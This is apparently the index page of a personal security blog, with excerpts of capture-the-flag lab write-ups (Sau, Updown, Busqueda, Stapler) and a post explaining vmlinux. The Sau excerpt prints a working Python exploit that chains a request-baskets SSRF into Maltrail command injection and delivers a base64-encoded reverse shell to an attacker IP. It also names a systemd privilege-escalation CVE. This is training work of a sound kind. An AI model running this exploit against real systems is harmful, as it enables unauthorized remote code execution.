I want to be a Hacker 👋

I’ve spent years managing and developing user-centric services, which led to a strong interest in services’ security and reliability. This interest drew me to System Security and Rust - a language designed for memory safety.
 

I acquired South Korea’s Engineer Information Security (정보보안기사) national certification. Now, I’m taking a step further into the offensive side by preparing for the OSCP (Offensive Security Certified Professional) certification.


Sau Writeup

Enumeration

Nmap

    PORT      STATE SERVICE
    22/tcp    open  ssh
    55555/tcp open  unknown

Request Basket

When I connected to port 55555 over HTTP, a service called request-basket came up.

Exploitation

CVE-2023-27163

    #!/usr/bin/env python3
    import requests
    import sys
    import random
    import string
    import base64
    import time

    def ensure_http_schema(url):
        if not url.startswith(("http://", "https://")):
            return "http://" + url
        return url

    def generate_basket_name(length=6):
        return ''.join(random.choices(string.ascii_lowercase, k=length))

    def create_proxy_basket(server_url, forward_url):
        if not server_url.endswith("/"):
            server_url += "/"
        basket_name = generate_basket_name()
        api_url = f"{server_url}api/baskets/{basket_name}"
        payload = {
            "forward_url": forward_url,
            "proxy_response": True,
            "insecure_tls": False,
            "expand_path": True,
            "capacity": 250
        }
        print(f"[+] Creating proxy basket '{basket_name}' pointing to {forward_url}")
        r = requests.post(api_url, json=payload)
        if r.status_code not in [200, 201]:
            print(f"[!] Failed to create basket: {r.status_code} {r.text}")
            sys.exit(1)
        token = r.json().get("token")
        basket_url = f"{server_url}{basket_name}"
        print(f"[+] Basket created: {basket_url}")
        print(f"[+] Authorization Token: {token}")
        return basket_url

    def send_reverse_shell(proxy_url, attacker_ip, attacker_port):
        print("[+] Encoding reverse shell payload...")
        payload = f"""python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{attacker_ip}",{attacker_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("sh")'"""
        b64_payload = base64.b64encode(payload.encode()).decode()
        injected_payload = f'`echo {b64_payload} | base64 -d | bash`'
        print("[+] Sending command injection via proxy to /login...")
        response = requests.post(f"{proxy_url}/login", data={"username": f";{injected_payload}"})
        if response.status_code in [200, 302]:
            print("[+] Exploit sent successfully! Check your listener.")
        else:
            print(f"[!] Exploit may have failed. HTTP {response.status_code}: {response.text}")

    if __name__ == "__main__":
        if len(sys.argv) != 4:
            print(f"Usage: {sys.argv[0]} <attacker_ip> <attacker_port> <request_baskets_url>")
            print(f"Example: {sys.argv[0]} 10.10.10.10 8000 http://10.129.229.26:55555")
            sys.exit(1)
        attacker_ip = sys.argv[1]
        attacker_port = int(sys.argv[2])
        request_baskets_url = ensure_http_schema(sys.argv[3])
        proxy_target_url = "http://127.0.0.1:80"
        proxy_url = create_proxy_basket(request_baskets_url, proxy_target_url)
        time.sleep(3)
        send_reverse_shell(proxy_url, attacker_ip, attacker_port)

PoC source: GitHub - bl4ckarch/ssrf_to_rce_sau: A simple python script that exploits, Service side request forgery on the request-basket 1.2.1 version then Unauith Command injection via Vulnerable parameter

The SSRF is used to deliver the payload to the internal service on port 80. A reverse shell is obtained through the RCE vulnerability in Maltrail on port 80.

Privilege Escalation

sudo -l

    Matching Defaults entries for puma on sau:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User puma may run the following commands on sau:
        (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

I use sudo -l to check which commands can be run with root privileges. /usr/bin/systemctl status could be run.

    /usr/bin/systemctl --version
    systemd 245 (245.4-4ubuntu3.22)

Checking the systemd version showed that it was 245.4.

CVE-2023-26604

💀 Exploit for systemd 246 - Local Privilege Escalation CVE-2023-26604 ...

November 2, 2025 · 2 min · 353 words · Me

Updown Writeup

Enumeration

Nmap

command

    sudo nmap -p- target -T4

result

    Nmap scan report for target (10.129.227.227)
    Host is up (0.24s latency).
    Not shown: 65533 closed tcp ports (reset)
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http

We can see that ports 22 and 80 are open.

command

    sudo nmap -p 22,80 -sC -sV target

result

    Host is up (0.24s latency).
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA)
    |   256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA)
    |_  256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519)
    80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
    |_http-title: Is my Website up ?
    |_http-server-header: Apache/2.4.41 (Ubuntu)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

...

October 13, 2025 · 4 min · 769 words · Me

Busqueda Writeup

Enumeration

Nmap

command

    sudo nmap -sC -sV target -T4

result

    Nmap scan report for 10.129.228.217
    Host is up (0.27s latency).
    Not shown: 998 closed tcp ports (reset)
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA)
    |_  256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519)
    80/tcp open  http    Apache httpd 2.4.52
    |_http-server-header: Apache/2.4.52 (Ubuntu)
    |_http-title: Did not follow redirect to http://searcher.htb/
    Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see that the HTTP and SSH ports are open.

gobuster

command

    gobuster dir -u http://target -w ~/wordlists/dirb/common.txt

result

    Progress: 0 / 1 (0.00%)
    2025/10/10 14:04:20 the server returns a status code that matches the provided options for non existing urls. http://target/4a437574-206b-45c5-80a3-853688eb8182 => 302 (redirect to http://searcher.htb/) (Length: 276). Please exclude the response length or the status code or set the wildcard option.. To continue please exclude the status code or the length

The server redirects to searcher.htb, so I edit the /etc/hosts file to map the target IP to that URL. ...

October 10, 2025 · 4 min · 644 words · Me

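What is vmlinux?

What is vmlinux?

If you have ever built the Linux kernel, you have probably seen files named vmlinux and vmlinuz. Even if you have never built one, you may have come across vmlinuz or bzImage in the /boot directory while browsing the Linux root filesystem. In this post, we will look at what these files are and what role they play.

vmlinux

First, the Linux kernel is an executable program like any other. Just as building the C source file main.c with gcc produces an ELF binary named a.out, building the kernel also produces an ELF binary. That binary is vmlinux. ...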

September 29, 2025 · 3 min · 457 words · Me

Stapler Writeup

About this lab

Utilize enumeration, web enumeration, and WordPress enumeration techniques to identify vulnerabilities. Engage in database enumeration and implement privilege escalation strategies. Additionally, harness the abuse of sudo permissions to enhance your access. This lab is designed to capitalize on your skills in vulnerability exploitation.

Enumeration

Nmap

command

    sudo nmap -p- -T4 target

result

    Host is up (0.098s latency).
    Not shown: 65523 filtered tcp ports (no-response)
    PORT      STATE  SERVICE
    20/tcp    closed ftp-data
    21/tcp    open   ftp
    22/tcp    open   ssh
    53/tcp    open   domain
    80/tcp    open   http
    123/tcp   closed ntp
    137/tcp   closed netbios-ns
    138/tcp   closed netbios-dgm
    139/tcp   open   netbios-ssn
    666/tcp   open   doom
    3306/tcp  open   mysql
    12380/tcp open   unknown

command ...

September 19, 2025 · 4 min · 700 words · Me